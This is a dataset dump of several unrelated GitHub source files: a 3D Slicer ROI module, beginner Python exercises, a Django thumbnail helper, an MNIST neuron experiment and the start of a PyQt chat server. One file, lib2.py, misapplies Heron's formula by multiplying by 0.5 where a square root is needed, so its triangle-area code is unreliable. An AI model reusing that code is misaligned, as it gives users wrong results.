clipOutsideSurface:\n\t\t\tstencilToImage.ReverseStencilOff()\n\t\telse:\n\t\t\tstencilToImage.ReverseStencilOn()\n\t\tstencilToImage.SetBackgroundValue(fillValue)\n\t\tstencilToImage.Update()\n\n\t\t# Update the volume with the stencil operation result\n\t\toutputImageData = vtk.vtkImageData()\n\t\toutputImageData.DeepCopy(stencilToImage.GetOutput())\n\t\t\n\t\toutputVolume.SetAndObserveImageData(outputImageData);\n\t\toutputVolume.SetIJKToRASMatrix(ijkToRas)\n\n\t\t# Add a default display node to output volume node if it does not exist yet\n\t\tif not outputVolume.GetDisplayNode:\n\t\t\tdisplayNode=slicer.vtkMRMLScalarVolumeDisplayNode()\n\t\t\tdisplayNode.SetAndObserveColorNodeID(\"vtkMRMLColorTableNodeGrey\")\n\t\t\tslicer.mrmlScene.AddNode(displayNode)\n\t\t\toutputVolume.SetAndObserveDisplayNodeID(displayNode.GetID())\n\n\t\treturn True\n\n\tdef updateModelFromMarkup(self, inputMarkup, outputModel):\n\t\t\"\"\"\n\t\tUpdate model to enclose all points in the input markup list\n\t\t\"\"\"\n\t\t\n\t\t# Delaunay triangulation is robust and creates nice smooth surfaces from a small number of points,\n\t\t# however it can only generate convex surfaces robustly.\n\t\tuseDelaunay = True\n\t\t\n\t\t# Create polydata point set from markup points\n\t\t\n\t\tpoints = vtk.vtkPoints()\n\t\tcellArray = vtk.vtkCellArray()\n\t\t\n\t\tnumberOfPoints = inputMarkup.GetNumberOfFiducials()\n\t\t\n\t\t# Surface generation algorithms behave unpredictably when there are not enough points\n\t\t# return if there are very few points\n\t\tif useDelaunay:\n\t\t\tif numberOfPoints<3:\n\t\t\t\treturn\n\t\telse:\n\t\t\tif numberOfPoints<10:\n\t\t\t\treturn\n\n\t\tpoints.SetNumberOfPoints(numberOfPoints)\n\t\tnew_coord = [0.0, 0.0, 0.0]\n\n\t\tfor i in range(numberOfPoints):\n\t\t\tinputMarkup.GetNthFiducialPosition(i,new_coord)\n\t\t\tpoints.SetPoint(i, new_coord)\n\n\t\tcellArray.InsertNextCell(numberOfPoints)\n\t\tfor i in range(numberOfPoints):\n\t\t\tcellArray.InsertCellPoint(i)\n\n\t\tpointPolyData = vtk.vtkPolyData()\n\t\tpointPolyData.SetLines(cellArray)\n\t\tpointPolyData.SetPoints(points)\n\n\t\t\n\t\t# Create surface from point set\n\n\t\tif useDelaunay:\n\t\t\t\t\t\n\t\t\tdelaunay = vtk.vtkDelaunay3D()\n\t\t\tdelaunay.SetInputData(pointPolyData)\n\n\t\t\tsurfaceFilter = vtk.vtkDataSetSurfaceFilter()\n\t\t\tsurfaceFilter.SetInputConnection(delaunay.GetOutputPort())\n\n\t\t\tsmoother = vtk.vtkButterflySubdivisionFilter()\n\t\t\tsmoother.SetInputConnection(surfaceFilter.GetOutputPort())\n\t\t\tsmoother.SetNumberOfSubdivisions(3)\n\t\t\tsmoother.Update()\n\n\t\t\toutputModel.SetPolyDataConnection(smoother.GetOutputPort())\n\t\t\t\n\t\telse:\n\t\t\t\n\t\t\tsurf = vtk.vtkSurfaceReconstructionFilter()\n\t\t\tsurf.SetInputData(pointPolyData)\n\t\t\tsurf.SetNeighborhoodSize(20)\n\t\t\tsurf.SetSampleSpacing(80) # lower value follows the small details more closely but more dense pointset is needed as input\n\n\t\t\tcf = vtk.vtkContourFilter()\n\t\t\tcf.SetInputConnection(surf.GetOutputPort())\n\t\t\tcf.SetValue(0, 0.0)\n\n\t\t\t# Sometimes the contouring algorithm can create a volume whose gradient\n\t\t\t# vector and ordering of polygon (using the right hand rule) are\n\t\t\t# inconsistent. vtkReverseSense cures this problem.\n\t\t\treverse = vtk.vtkReverseSense()\n\t\t\treverse.SetInputConnection(cf.GetOutputPort())\n\t\t\treverse.ReverseCellsOff()\n\t\t\treverse.ReverseNormalsOff()\n\n\t\t\toutputModel.SetPolyDataConnection(reverse.GetOutputPort())\n\n\t\t# Create default model display node if does not exist yet\n\t\tif not outputModel.GetDisplayNode():\n\t\t\tmodelDisplayNode = slicer.mrmlScene.CreateNodeByClass(\"vtkMRMLModelDisplayNode\")\n\t\t\tmodelDisplayNode.SetColor(0,0,1) # Blue\n\t\t\tmodelDisplayNode.BackfaceCullingOff()\n\t\t\tmodelDisplayNode.SliceIntersectionVisibilityOn()\n\t\t\tmodelDisplayNode.SetOpacity(0.3) # Between 0-1, 1 being opaque\n\t\t\tslicer.mrmlScene.AddNode(modelDisplayNode)\n\t\t\toutputModel.SetAndObserveDisplayNodeID(modelDisplayNode.GetID())\n\t\n\t\toutputModel.GetDisplayNode().SliceIntersectionVisibilityOn()\n\t\t\t\n\t\toutputModel.Modified()\n\n\tdef showInSliceViewers(self, volumeNode, sliceWidgetNames):\n\t\t# Displays volumeNode in the selected slice viewers as background volume\n\t\t# Existing background volume is pushed to foreground, existing foreground volume will not be shown anymore\n\t\t# sliceWidgetNames is a list of slice view names, such as [\"Yellow\", \"Green\"]\n\t\tif not volumeNode:\n\t\t\treturn\n\t\tnewVolumeNodeID = volumeNode.GetID()\n\t\tfor sliceWidgetName in sliceWidgetNames:\n\t\t\tsliceLogic = slicer.app.layoutManager().sliceWidget(sliceWidgetName).sliceLogic()\n\t\t\tforegroundVolumeNodeID = sliceLogic.GetSliceCompositeNode().GetForegroundVolumeID()\n\t\t\tbackgroundVolumeNodeID = sliceLogic.GetSliceCompositeNode().GetBackgroundVolumeID()\n\t\t\tif foregroundVolumeNodeID == newVolumeNodeID or backgroundVolumeNodeID == newVolumeNodeID:\n\t\t\t\t# new volume is already shown as foreground or background\n\t\t\t\tcontinue\n\t\t\tif backgroundVolumeNodeID:\n\t\t\t\t# there is a background volume, push it to the foreground because we will replace the background volume\n\t\t\t\tsliceLogic.GetSliceCompositeNode().SetForegroundVolumeID(backgroundVolumeNodeID)\n\t\t\t# show the new volume as background\n\t\t\tsliceLogic.GetSliceCompositeNode().SetBackgroundVolumeID(newVolumeNodeID)","repo_name":"AndrewBeers/QTIMSubtractionMap","sub_path":"ContrastSubtractionWizard/ROI.py","file_name":"ROI.py","file_ext":"py","file_size_in_byte":26522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71135529386","text":"# Interchange 1st and last elments in a list.\n\ndef swap_method_1(list):\n n = len(list)\n list[0],list[n-1] = list[n-1],list[0]\n return list\n\ndef swap_method_2(list):\n a,*b,c = list\n list = [c,*b,a]\n return list\n\nn = int(input(\"Enter the size :\"))\nlist = []\nfor i in range (n):\n while True:\n try:\n element = int(input(\"enter the element : \"))\n list.append(element)\n break\n except Exception as e :\n print(\"Please enter the number only.\")\n\nprint(\"The normal way swapping\")\nprint(swap_method_1(list))\n\nprint(\"swapping the element using * operands\")\nprint(swap_method_2(list))","repo_name":"growdataskills/Python_Fundamentals","sub_path":"python_programs/Interchange_element.py","file_name":"Interchange_element.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"37"} +{"seq_id":"39442900603","text":"\"\"\"SimplePicture plugin for DjangoCMS.\"\"\"\nfrom .defaults import SIMPLEPICTURE_PRESETS\n\n\ndef get_picture_info(instance, preset_name):\n \"\"\"\n Compute picture information for a given preset defined in settings.\n\n A preset is of the form:\n\n \"default\": {\n \"src\": {\"size\": (1000, 1000), \"crop\": \"smart\"}, # easythumbnail options\n \"srcset\": [\n {\n \"options\": {\"size\": (800, 800), \"crop\": \"smart\"},\n \"descriptor\": \"800w\",\n },\n {\n \"options\": {\"size\": (600, 600), \"crop\": \"smart\"},\n \"descriptor\": \"600w\",\n },\n ],\n \"sizes\": \"100vw\", # e.g 1000px or 100vw\n }\n\n \"\"\"\n # Bail out if the picture does not have an image as that's the object we use to get\n # all the information we need to return any picture info.\n if not instance.picture:\n return None\n\n thumbnailer = instance.picture.easy_thumbnails_thumbnailer\n\n # Look for the preset in settings and fallback to \"default\"\n preset = SIMPLEPICTURE_PRESETS.get(preset_name, SIMPLEPICTURE_PRESETS[\"default\"])\n\n # Complete picture information with thumbnails url calculated according to what is\n # defined in the preset\n picture_info = {}\n location_dict = {\"subject_location\": instance.picture.subject_location}\n\n # - src\n options = preset[\"src\"].copy()\n options.update(location_dict)\n picture_info[\"src\"] = thumbnailer.get_thumbnail(options).url\n\n # - srcset\n srcset = []\n for info in preset.get(\"srcset\", []):\n options = info[\"options\"].copy()\n options.update(location_dict)\n url = thumbnailer.get_thumbnail(options).url\n srcset.append(f\"{url:s} {info['descriptor']:s}\")\n picture_info[\"srcset\"] = \", \".join(srcset) if srcset else None\n\n # - sizes\n picture_info[\"sizes\"] = preset.get(\"sizes\")\n\n return picture_info\n","repo_name":"openfun/richie","sub_path":"src/richie/plugins/simple_picture/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":240,"dataset":"github-code","pt":"37"} +{"seq_id":"5250700746","text":"from .t5_relation_model import T5ForConditionalGeneration as T5_Relation_debug # 模仿self.shard的处理过程处理relation attention \nfrom transformers import T5ForConditionalGeneration as T5_Pretrained\nfrom transformers import AutoTokenizer, AutoConfig\n\n\ndef get_relation_t5_model(config, model_name_or_path):\n if 'checkpoint' in model_name_or_path:\n print(\"use relation model from checkpoint\")\n model = T5_Relation_debug.from_pretrained(model_name_or_path)\n else:\n # 返回修改了带有relation的t5模型\n my_config = config\n model = T5_Relation_debug(config=my_config)\n\n model_pretrained = T5_Pretrained.from_pretrained(model_name_or_path)\n parameter_dict = model_pretrained.state_dict()\n model_dict = model.state_dict()\n model_dict.update(parameter_dict)\n model.load_state_dict(model_dict)\n\n return model \n\n\ndef get_pretrained_t5_model():\n '''\n return a t5-small model provided by huggingface transformers lib.\n '''\n model = T5_Pretrained.from_pretrained(\"t5-small\")\n\n return model\n\n\n","repo_name":"shadowbringer1/text2sparql","sub_path":"seq2seq/model/model_utils.py","file_name":"model_utils.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38811242877","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch import optim\nimport torchvision\nfrom torchvision import transforms, datasets\nimport copy\nimport matplotlib.pyplot as plt\nimport matplotlib.pylab as pl\nimport seaborn as sns\nimport gc\nsns.set_theme(style=\"whitegrid\")\n\nseed = 272727\ntorch.manual_seed(seed)\nnp.random.seed(seed)\n\ngpu = True\nif gpu:\n torch.set_default_tensor_type(torch.cuda.FloatTensor)\n device = 'cuda'\nelse:\n torch.set_default_tensor_type(torch.FloatTensor)\n device = 'cpu'\n\n'''\nTrain an adaptive neuron. It starts as a triangle kernel and learns 'broader' representations.\n'''\n\ninput_size = 28 * 28\nnum_classes = 10\nnum_epochs = 100\nlr = 0.03\nmomentum = 0.9\nlearning = 0\n\nretest_rate = 10\n\nerror_threshold = 0.3\nnode = 0\ntri = 0\n'''\nbest widths\nn0t1 = 0.1 \nn1t1 = 0.075\nn0t0 = 0.1\nn1t0 = 0.025 but lots of n 0.05 also ok\n'''\n\n# parameter_settings = [0.075, 0.1, 0.125, 0.15]\n# parameter_settings = [0.04]\n# parameter_settings = [0.01, 0.025, 0.05, 0.075, 0.1, 0.125, 0.15, 0.175, 0.2, 0.3]\nparameter_settings = [0.1]\ncolours = pl.cm.gist_rainbow(np.linspace(0, 1, len(parameter_settings)))\n\n\ntest_label = \"2n{}t{} w{} et{} learning{}\".format(node, tri, parameter_settings, error_threshold, learning)\n\nbatch_size_train = 32\nbatch_size_test = 32\n\ntrainset = datasets.MNIST('', download=True, train=True, transform=transforms.ToTensor())\ntestset = datasets.MNIST('', download=True, train=False, transform=transforms.ToTensor())\ntrain_loader = torch.utils.data.DataLoader(trainset, batch_size=batch_size_train,\n shuffle=True, generator=torch.Generator(device=device))\ntest_loader = torch.utils.data.DataLoader(testset, batch_size=batch_size_test,\n shuffle=True, generator=torch.Generator(device=device))\n\n\nclass Triangle(nn.Module):\n def __init__(self, mean, std):\n super(Triangle, self).__init__()\n # self.mean = torch.nn.Parameter(mean)\n self.mean = mean\n self.std = torch.nn.Parameter(torch.Tensor([std for i in range(len(mean))]))\n # self.std = torch.nn.Parameter(std)\n # self.std = std\n\n def forward(self, x, batch_size):\n broadcast = torch.transpose(torch.stack([self.mean for i in range(batch_size)]), 0, 1)\n # broadcast = torch.transpose(torch.stack([self.mean for i in range(batch_size)]), 0, 1)\n # tout = torch.exp((-(torch.sum(torch.square(broadcast - x), dim=2) / input_size) ** 2)/(2 * self.std.unsqueeze(1) ** 2))\n tout = torch.max(torch.tensor(0), 1 - torch.transpose(torch.abs(broadcast - x), 0, 1) / self.std.unsqueeze(1))\n # tout = torch.max(torch.tensor(0), 1 - torch.abs(broadcast - x) / self.std)\n # tout = torch.exp((-(torch.sum(torch.square(broadcast - x), dim=2) / input_size) ** 2)/(2 * self.std ** 2))\n # tout = torch.exp((-(torch.sum(torch.abs(broadcast - x), dim=2) / input_size) ** 2)/(2 * self.std ** 2))\n return torch.transpose(tout, 0, 1)\n\nclass Gaussian(nn.Module):\n\n def __init__(self, mean=0, std=1):\n super(Gaussian, self).__init__()\n self.mean = torch.nn.Parameter(mean)\n # self.mean = mean\n # self.std = torch.nn.Parameter(torch.Tensor([std for i in range(len(mean))]))\n self.std = std\n\n def forward(self, x, batch_size):\n broadcast = torch.transpose(torch.stack([self.mean for i in range(batch_size)]), 0, 1)\n # broadcast = torch.transpose(torch.stack([self.mean for i in range(batch_size)]), 0, 1)\n # broadcast = torch.stack([self.mean for i in range(len(x))])\n gauss = torch.exp((-(broadcast - x) ** 2)/(2 * self.std ** 2))\n # return torch.clamp(gauss, min=self.min, max=self.max)\n return gauss\n\nclass Node_Triangle(nn.Module):\n def __init__(self, mean, std):\n super(Node_Triangle, self).__init__()\n # self.mean = torch.nn.Parameter(mean)\n self.mean = mean\n # self.std = torch.nn.Parameter(torch.Tensor([std for i in range(len(mean))]))\n self.std = std\n\n def forward(self, x, batch_size):\n broadcast = torch.transpose(torch.stack([self.mean for i in range(batch_size)]), 0, 1)\n # broadcast = torch.transpose(torch.stack([self.mean for i in range(batch_size)]), 0, 1)\n # tout = torch.exp((-(torch.sum(torch.square(broadcast - x), dim=2) / input_size) ** 2)/(2 * self.std.unsqueeze(1) ** 2))\n tout = torch.max(torch.tensor(0), 1 - (torch.sum(torch.square(broadcast - x), dim=2) / input_size) / self.std)\n # tout = torch.exp((-(torch.sum(torch.square(broadcast - x), dim=2) / input_size) ** 2)/(2 * self.std ** 2))\n # tout = torch.exp((-(torch.sum(torch.abs(broadcast - x), dim=2) / input_size) ** 2)/(2 * self.std ** 2))\n return tout\n\nclass Node_Gaussian(nn.Module):\n\n def __init__(self, mean=0, std=1):\n super(Node_Gaussian, self).__init__()\n self.mean = torch.nn.Parameter(mean)\n # self.mean = mean\n self.std = torch.nn.Parameter(torch.Tensor([std for i in range(len(mean))]))\n # self.std = std\n\n def forward(self, x, batch_size):\n broadcast = torch.transpose(torch.stack([self.mean for i in range(batch_size)]), 0, 1)\n # broadcast = torch.transpose(torch.stack([self.mean for i in range(batch_size)]), 0, 1)\n gauss = torch.exp((-(torch.sum(torch.square(broadcast - x), dim=2) / input_size) ** 2)/(2 * self.std.unsqueeze(1) ** 2))\n # gauss = torch.exp((-(torch.sum(torch.square(broadcast - x), dim=2) / input_size) ** 2)/(2 * self.std ** 2))\n # gauss = torch.exp((-(torch.sum(torch.abs(broadcast - x), dim=2) / input_size) ** 2)/(2 * self.std ** 2))\n return gauss\n\nclass Average_with_mask(nn.Module):\n def __init__(self, mask):\n super(Average_with_mask, self).__init__()\n self.mask = mask\n\n def forward(self, x):\n denom = torch.sum(self.mask, -1, keepdim=True)\n out = torch.sum(torch.transpose(x, 0, 1) * self.mask, dim=2) / torch.transpose(denom, 0, 1)\n return torch.transpose(out, 0, 1)\n\n\n# Fully connected neural network with one hidden layer\nclass NeuralNet(nn.Module):\n def __init__(self, num_classes, centres, synapse_mask, output_errors, stdev, node=True, tri=True):\n super(NeuralNet, self).__init__()\n self.hidden_size = len(centres)\n self.synapse_mask = synapse_mask\n self.node = node\n\n if node:\n if tri:\n self.act_hidden = Node_Triangle(mean=centres, std=stdev)\n else:\n self.act_hidden = Node_Gaussian(mean=centres, std=stdev)\n else:\n if tri:\n self.act_hidden = Triangle(mean=centres, std=stdev)\n else:\n self.act_hidden = Gaussian(mean=centres, std=stdev)\n self.average_synapses = Average_with_mask(synapse_mask)\n self.act_out = Gaussian(mean=torch.ones(self.hidden_size), std=stdev)\n self.output_conn = nn.Linear(self.hidden_size, num_classes, bias=False)\n self.output_conn.weight.data = output_errors\n self.output_conn.weight.requires_grad = False\n # self.output_conn.bias.data = torch.zeros_like(self.output_conn.bias.data)\n # self.act_out = Gaussian(mean=torch.Tensor(1), std=stdev)\n # self.output_act = nn.LogSoftmax(dim=1)\n self.output_act = nn.Softmax(dim=1)\n\n def forward(self, x):\n batch_size = len(x)\n # out = self.input_conn(x)\n out = self.act_hidden(x, batch_size)\n if not self.node:\n out = self.average_synapses(out)\n out = self.act_out(out, batch_size)\n out = self.output_conn(torch.transpose(out, 0, 1))\n out = self.output_act(out)\n return out\n\ndef check_memory(where=''):\n print(where)\n t = torch.cuda.get_device_properties(0).total_memory\n r = torch.cuda.memory_reserved(0)\n a = torch.cuda.memory_allocated(0)\n f = r - a # free inside reserved\n print(\" total reserved allocated free\")\n print([\"{0:.4E}\".format(thing) for thing in [t, r, a, f]])\n\ndef make_network(new_centres, new_mask, errors, old_model=False):\n models = {}\n new_params = []\n if old_model:\n for width, m, new_c, new_m, e in zip(parameter_settings, old_model, new_centres, new_mask, errors):\n # check_memory(\"mn\")\n if not len(new_c):\n models['{}'.format(width)] = old_model['{}'.format(width)]\n new_params.append({'params': old_model['{}'.format(width)].parameters()})\n continue\n old_centres = old_model[m].act_hidden.mean\n old_weights = old_model[m].output_conn.weight.data\n old_mask = old_model[m].synapse_mask\n # check_memory(\"mnw\")\n models['{}'.format(width)] = NeuralNet(num_classes,\n centres=torch.vstack([old_centres, new_c]),\n synapse_mask=torch.vstack([old_mask, new_m]),\n output_errors=torch.hstack([old_weights, e]),\n node=node,\n tri=tri,\n stdev=width).to(device)\n # check_memory(\"mnn\")\n new_params.append({'params': models['{}'.format(width)].parameters()})\n # check_memory(\"mnp\")\n\n else:\n for width in parameter_settings:\n models['{}'.format(width)] = NeuralNet(num_classes,\n centres=new_centres,\n synapse_mask=new_mask,\n output_errors=errors,\n node=node,\n tri=tri,\n stdev=width).to(device)\n new_params.append({'params': models['{}'.format(width)].parameters()})\n\n # lossFunction = nn.NLLLoss(reduction='none')\n lossFunction = nn.CrossEntropyLoss(reduction='none')\n optimize_all = optim.SGD(new_params,\n lr=lr, momentum=momentum)\n return models, lossFunction, optimize_all\n\ndef neurogen_process(inputs, outputs, labels, loss):\n # centres = torch.stack([inputs for i in range(len(loss))])\n centres = inputs\n one_hot = torch.zeros([len(labels), num_classes])\n for i, l in enumerate(labels):\n one_hot[i, l] = 1\n errors = one_hot - torch.stack(outputs)\n triggered = (torch.max(torch.abs(errors), dim=2)[0] > error_threshold).nonzero(as_tuple=False)\n\n new_centres = [[] for i in range(len(loss))]\n new_errors = [[] for i in range(len(loss))]\n for [i, j] in triggered:\n new_centres[i].append(centres[j])\n new_errors[i].append(errors[i, j, :])\n mask = []\n for i in range(len(new_centres)):\n if len(new_centres[i]):\n new_centres[i] = torch.stack(new_centres[i])\n mask.append(torch.ones_like(new_centres[i]))\n new_errors[i] = torch.transpose(torch.stack(new_errors[i]), 0, 1)\n else:\n mask.append([])\n new_centres = new_centres\n new_errors = new_errors\n return new_centres, mask, new_errors\n\n\nfor images, labels in train_loader:\n images = images.reshape(-1, 784).to(torch.device(device))\n\n errors = torch.zeros([num_classes, batch_size_train])\n for i, l in enumerate(labels):\n errors[l, i] = 1\n\n models, lossFunction, optimize_all = make_network(new_centres=images,\n new_mask=torch.ones_like(images),\n errors=errors)\n break\n\ntraining_losses = []\ntesting_accuracies = []\n\nstop_growing = False\n\nfor epoch in range(num_epochs):\n check_memory(\"start\")\n\n print(test_label)\n processed_masks = []\n for p in models:\n models[p].train()\n loss_ = [0 for i in range(len(parameter_settings))]\n # with torch.no_grad():\n for batch, (images, labels) in enumerate(train_loader):\n # check_memory(\"batch\")\n print(\"Starting batch\", batch+1, \"/\", len(train_loader))\n if not batch and not epoch:\n continue\n images = images.reshape(-1, 784).to(torch.device(device))\n\n output = []\n for p in models:\n output.append(models[p](images))\n # check_memory(\"forward\")\n\n loss = []\n example_loss = []\n for out in output:\n loss_each = lossFunction(out, labels)\n example_loss.append(loss_each)\n loss.append(torch.mean(loss_each))\n # check_memory(\"loss\")\n\n optimize_all.zero_grad()\n\n if learning:# and epoch:\n for l in loss:\n l.backward()\n optimize_all.step()\n # check_memory(\"learning\")\n\n if not stop_growing and not epoch:\n centres, mask, errors = neurogen_process(images, output, labels, example_loss)\n # check_memory(\"process\")\n\n models, lossFunction, optimize_all = make_network(new_centres=centres,\n new_mask=mask,\n errors=errors,\n old_model=models)\n # check_memory(\"make\")\n if (batch-1) % retest_rate == 0:\n with torch.no_grad():\n for p in models:\n models[p].eval()\n correct = [0 for i in range(len(parameter_settings))]\n total = 0\n for images, labels in test_loader:\n images = images.reshape(-1, 784).to(torch.device(device))\n out = []\n for p in models:\n out.append(models[p](images))\n predicted = []\n for o in out:\n _, pred = torch.max(o, 1)\n predicted.append(pred)\n for i in range(len(parameter_settings)):\n correct[i] += (predicted[i] == labels).sum().item()\n total += labels.size(0)\n print(test_label)\n testing_accuracies.append(100 * np.array(correct) / total)\n for i in range(len(parameter_settings)):\n print('Testing accuracy: {} % {} n{}'.format(\n np.array(testing_accuracies).astype(float)[:, i],\n parameter_settings[i],\n models['{}'.format(parameter_settings[i])].hidden_size))\n # check_memory(\"loss2\")\n for i in range(len(parameter_settings)):\n loss_[i] += loss[i].detach()\n torch.cuda.empty_cache()\n\n for i in range(len(parameter_settings)):\n print(\"Epoch{}, Training loss:{} types:{}\".format(epoch,\n loss_[i] / len(train_loader),\n parameter_settings[i]))\n training_losses.append(loss_)\n\n # Testing\n with torch.no_grad():\n for p in models:\n models[p].eval()\n correct = [0 for i in range(len(parameter_settings))]\n total = 0\n for images, labels in test_loader:\n images = images.reshape(-1, 784).to(torch.device(device))\n out = []\n for p in models:\n out.append(models[p](images))\n predicted = []\n for o in out:\n _, pred = torch.max(o, 1)\n predicted.append(pred)\n for i in range(len(parameter_settings)):\n correct[i] += (predicted[i] == labels).sum().item()\n total += labels.size(0)\n print(test_label)\n for i in range(len(parameter_settings)):\n print('Testing accuracy: {} % {}'.format(100 * correct[i] / total, parameter_settings[i]))\n testing_accuracies.append(100 * np.array(correct) / total)\n\n if len(testing_accuracies) % 10 == 0:\n print(\"plotting\")\n plt.figure()\n for i, p, in enumerate(models):\n print(\"\\n\", np.max(np.array(testing_accuracies).astype(float)[:, i]), p, models[p].hidden_size, \"\\n\", np.array(testing_accuracies).astype(float)[:, i])\n plt.plot([x for x in range(len(np.array(testing_accuracies).astype(float)[:, i]))],\n np.array(testing_accuracies).astype(float)[:, i], label=p, color=colours[i])\n plt.ylim([85, 100])\n plt.xlabel('epoch')\n plt.ylabel('test accuracy')\n plt.legend(loc='lower right')\n figure = plt.gcf()\n figure.set_size_inches(16, 9)\n plt.tight_layout(rect=[0, 0.3, 1, 0.95])\n plt.suptitle(test_label, fontsize=16)\n plt.grid(visible=None, which='both')\n plt.savefig(\"./plots/{}.png\".format(test_label), bbox_inches='tight', dpi=200, format='png')\n plt.close()\n\n print(\"done plotting\")\n\n# torch.save(model, 'mnist_model.pt')\nprint(\"training:\")\nfor i, p, in enumerate(models):\n print(p, np.array(training_losses).astype(float)[:, i])\n# print(training_losses)\nprint(\"testing\")\n\nplt.figure()\nfor i, p, in enumerate(models):\n print(\"\\n\", p, \"\\n\", np.array(testing_accuracies).astype(float)[:, i])\n plt.plot([x for x in range(len(np.array(testing_accuracies).astype(float)[:, i]))],\n np.array(testing_accuracies).astype(float)[:, i], label=p, color=colours[i])\nplt.ylim([95, 100])\nplt.xlabel('epoch')\nplt.ylabel('test accuracy')\nplt.legend(loc='lower right')\nfigure = plt.gcf()\nfigure.set_size_inches(16, 9)\nplt.tight_layout(rect=[0, 0.3, 1, 0.95])\nplt.suptitle(test_label, fontsize=16)\nplt.savefig(\"./plots/{}.png\".format(test_label), bbox_inches='tight', dpi=200, format='png')\nplt.close()\n# print(testing_accuracies)\n\nprint('done')","repo_name":"adamgoodtime/neural_soup","sub_path":"small_experiments/neural_act.py","file_name":"neural_act.py","file_ext":"py","file_size_in_byte":18026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22707062919","text":"# coding:utf8\n\n# lib2.py\n\n\nclass Triangle(object):\n def __init__(self, a, b, c):\n self.a = a\n self.b = b\n self.c = c\n\n def get_Area(self):\n a, b, c = self.a, self.b, self.c\n p = (a + b + c) / 2\n area = (p * (p - a) * (p - b) * (p - c)) * 0.5\n return area\n\n\n","repo_name":"zhwl934008411/Python-Advanced-Programing","sub_path":"index7/lib2.py","file_name":"lib2.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"3674046016","text":"####################################################################################################\n\n# run statwt for cycle 2 data\n#############################\n\n\ndef correct_weights(MS_file, linefree):\n\n \"\"\"\n Correct the weights in cycle 2 data. Back then the weights were not meaningful.\n \"\"\"\n\n casalog.post(\"*\"*80)\n casalog.post(\"FUNCTION: CORRECT WEIGHTS\")\n casalog.post(\"*\"*80)\n\n # expand * because statwt cannot deal with all spws\n casalog.post(\" * expanding '*' in linefree range\")\n linefree_corrected = expand_spw_string(MS_file, linefree)\n\n\n casalog.post(\"*\"*80)\n casalog.post(\"* Getting weights from this range: \"+str(linefree))\n casalog.post(\"* which translates to: \"+str(linefree_corrected))\n casalog.post(\"*\"*80)\n\n # run statwt\n statwt(vis = MS_file,\n dorms = False,\n fitspw = linefree_corrected,\n combine = 'spw',\n minsamp = 2 # default\n )\n\n####################################################################################################\n","repo_name":"GiantMolecularCloud/NGC253-imaging","sub_path":"calibration_pipeline/correct_weights.py","file_name":"correct_weights.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25432958371","text":"#Name: Gabriel N Sa\n#09.07.2018\n#Desciption - Basic if statement test.\n\n#Getting temperature values:\ndef get_values():\n temperature = float(input('Enter the temperature in Celcius: '))\n return temperature\n\n#Checking temperature:\ndef check_temperature(temperature):\n if(temperature > 35):\n print(\"It's very hot!\")\n elif(temperature > 28 and temperature <= 35):\n print(\"It's hot!\") \n elif(temperature > 20 and temperature <= 28):\n print(\"It's nice!\")\n elif(temperature > 10 and temperature <= 20):\n print(\"It's cold\")\n else:\n print(\"It's very cold\")\n\n#Check the exit condition:\ndef check_exit_condition():\n option = input(\"Type 's' if you want to finish the program: \")\n print()\n if(option == 's'):\n return False\n else:\n return True\n\n#Main function:\nloop = True\nwhile loop:\n temperature = get_values()\n check_temperature(temperature)\n loop = check_exit_condition()\n\n","repo_name":"gabrielnsa/Exercises","sub_path":"if_statement1.py","file_name":"if_statement1.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38339704701","text":"from ClientListDialog import Ui_ClientListDialog\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom PyQt5.QtWidgets import QMessageBox\r\nfrom PyQt5.QtGui import QColor\r\nimport subprocess\r\nimport threading\r\nimport datetime\r\nimport sqlite3\r\nimport socket\r\nimport codecs\r\nimport time\r\nimport sys\r\nimport os\r\n\r\n\r\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\ndef killPort(port):\r\n\tfind_port = 'netstat -aon | findstr %s' % port\r\n\tresult = os.popen(find_port)\r\n\ttext = result.read()\r\n\ttext = [i.split(' ') for i in text.split('\\n') if i]\r\n\tpids = []\r\n\tfor i in text:\r\n\t\tpid = [u for u in i if u]\r\n\t\tif str(port) in pid[1]:\r\n\t\t\tpids.append(pid[-1])\r\n\tpids = list(set(pids))\r\n\tfor pid in pids:\r\n\t\tfind_kill = 'taskkill -f -pid %s' % pid\r\n\t\tresult = os.popen(find_kill)\r\n\r\nclass MyClientListDialog(QtWidgets.QDialog, Ui_ClientListDialog):\r\n\tdef __init__(self, clientTableName, onlineList):\r\n\t\tsuper().__init__()\r\n\t\tself.setupUi(self, clientTableName, onlineList)\r\n\r\nclass Ui_ServerWD(object):\r\n\tdef showClientList(self):\r\n\t\tdialog = MyClientListDialog(self.clientTableName, self.nicknames)\r\n\t\tdialog.exec_()\r\n\r\n\tdef closeEvent(self, event):\r\n\t\tclose = QMessageBox()\r\n\t\tclose.setWindowTitle(\"Close\")\r\n\t\tclose.setText(\"Are you sure?\")\r\n\t\tclose.setStandardButtons(QMessageBox.Yes | QMessageBox.Cancel)\r\n\t\tclose = close.exec()\r\n\t\tif close == QMessageBox.Yes:\r\n\t\t\trunnable = False\r\n\t\t\tserver.close()\r\n\t\t\tevent.accept()\r\n\t\telse:\r\n\t\t\tevent.ignore()\r\n\r\n\tdef setCurrentTime(self):\r\n\t\twhile True:\r\n\t\t\tcurrentTime = datetime.datetime.now()\r\n\t\t\tself.date = currentTime.strftime(\"%d/%m/%Y\")\r\n\t\t\tself.time = 